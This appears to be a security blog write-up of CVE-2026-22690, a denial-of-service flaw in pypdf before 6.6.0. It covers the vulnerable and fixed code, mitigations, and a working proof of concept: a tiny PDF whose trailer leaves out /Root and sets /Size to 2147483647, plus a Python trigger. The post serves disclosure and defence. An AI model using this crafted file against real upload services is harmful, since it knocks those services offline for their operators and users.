Feb 21, 2026·5 min read·5 visits
A resource exhaustion vulnerability in pypdf < 6.6.0 allows attackers to cause a Denial of Service (DoS) via malformed PDFs. By manipulating the trailer's `/Size` parameter and omitting `/Root`, the parser enters an unbounded loop.
Parsing PDFs is a thankless task, akin to translating ancient hieroglyphs written by a drunk scribe. `pypdf`, a popular Python library, tried to be helpful by 'fixing' broken files on the fly. Unfortunately, this benevolence created a massive denial-of-service vector (CVE-2026-22690). By simply omitting a root definition and lying about the file size, an attacker can force the library into a near-infinite search loop, pinning the CPU at 100% until the heat death of the universe—or until the OOM killer steps in.
PDFs are notoriously broken. The specification is a sprawling mess of legacy debt, and most PDF writers generate garbage that only Adobe Reader—and a few brave open-source libraries—can parse. pypdf falls into the "brave" category. It includes a "non-strict" mode (often the default) designed to recover data from malformed files.
Here is the problem: recovery requires heuristics. When a PDF is missing critical structural elements, the library has to go hunting for them. In CVE-2026-22690, the library's hunt for a missing /Root object turns into a death march. The developers assumed that the file's trailer dictionary would honestly report the number of objects via the /Size key.
In the security world, we have a golden rule: Never trust input metadata. If a file header says "I have 10 billion objects," you don't start a loop that counts to 10 billion. But that is exactly what happened here. This isn't a buffer overflow or a fancy ROP chain; it's a logic flaw born of optimism.
To understand this bug, you need to know how a PDF ends. The file concludes with a trailer dictionary, which points to the /Root (the catalog of the document) and usually includes a /Size key indicating the number of objects in the cross-reference table.
When pypdf operates in strict=False mode and encounters a PDF without a /Root pointer, it panics slightly. "No problem," it thinks, "I'll just scan all the objects to find one that looks like a Catalog."
How many objects does it scan? It asks the /Size key.
# The logic before the fix
nb = cast(int, self.trailer.get("/Size", 0))
for i in range(nb):
# Expensive lookup operation
o = self.get_object(i + 1)See the issue? The attacker controls /Size. If I hand you a 1KB PDF file but set /Size to 2,147,483,647 (MAX_INT), the library dutifully attempts to resolve over 2 billion objects. Since the file is small and those objects don't actually exist, the get_object call fails, catches the exception, and continues to the next iteration. It spins the CPU for hours, doing absolutely nothing of value.
The fix provided in version 6.6.0 is a classic "sanity check." The developers realized that while they want to recover broken files, they shouldn't spend eternity doing it. They introduced a hard limit on the recovery search.
Here is the diff analysis for pypdf/_reader.py:
The Vulnerable Logic:
if self._validated_root is None:
# Blindly trust /Size
nb = cast(int, self.trailer.get("/Size", 0))
for i in range(nb):
try:
o = self.get_object(i + 1)
# ... check if o is Catalog ...The Fixed Logic (v6.6.0):
# Introduce a configurable limit (default 10,000?)
self._root_object_recovery_limit = (
root_object_recovery_limit
if isinstance(root_object_recovery_limit, int)
else sys.maxsize
)
# ... inside the loop ...
for i in range(number_of_objects):
# The Circuit Breaker
if i >= self._root_object_recovery_limit:
raise LimitReachedError("Maximum Root object recovery limit reached.")This change ensures that even if /Size claims to be billions, the loop terminates after a reasonable number of attempts, preventing the CPU exhaustion.
Exploiting this is trivially easy. You don't need shellcode. You just need a text editor. A PDF is arguably just a text file with some binary blobs. We can construct a minimal "killer" PDF that consists of a header and a malicious trailer.
Step 1: The Header
Standard PDF header.
%PDF-1.7
Step 2: The Body We don't need a body. In fact, fewer objects make the parser hit the loop faster.
Step 3: The Malicious Trailer
We omit /Root (triggering the recovery path) and set /Size to a 32-bit integer limit.
trailer
<<
/Size 2147483647
>>
startxref
0
%%EOFStep 4: The Trigger Load this into a Python environment:
from pypdf import PdfReader
# strict=False is often the default or explicitly set to handle "bad" PDFs
reader = PdfReader("poison.pdf", strict=False)
# Accessing pages triggers the root lookup
print(len(reader.pages))Result: The process hangs. The fan spins up. The developer cries.
You might shrug at a DoS. "So what? I restart the container." But consider where pypdf is used. It's the engine behind thousands of "Upload your Resume" portals, automated invoice scanners, and archival bots.
If you run a service that accepts PDFs from the public internet and processes them asynchronously:
In serverless environments, this is particularly nasty as it guarantees a timeout, maxing out the billed duration for every invocation.
The mitigation is straightforward. If you are using pypdf, check your version.
Primary Mitigation:
Upgrade to pypdf >= 6.6.0.
pip install pypdf --upgradeWorkaround (if you can't upgrade): Enforce strict parsing. This disables the recovery logic entirely. The side effect is that actually broken PDFs will raise an exception instead of being partially read—but that is better than your server melting.
reader = PdfReader(stream, strict=True)If you must use older versions and allow non-strict parsing, wrap the processing logic in a strict timeout (e.g., using signal.alarm or async timeouts) to kill the process if it takes longer than a few seconds.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L| Product | Affected Versions | Fixed Version |
|---|---|---|
pypdf py-pdf | < 6.6.0 | 6.6.0 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v3.1 | 5.3 (Medium) |
| Attack Vector | Network (Context-dependent) |
| Impact | Denial of Service (Availability) |
| Exploit Status | PoC Available (Trivial to construct) |
| EPSS Score | 0.00019 (Low Probability) |
The software does not properly control the allocation and maintenance of a limited resource, allowing an actor to influence the amount of resources consumed.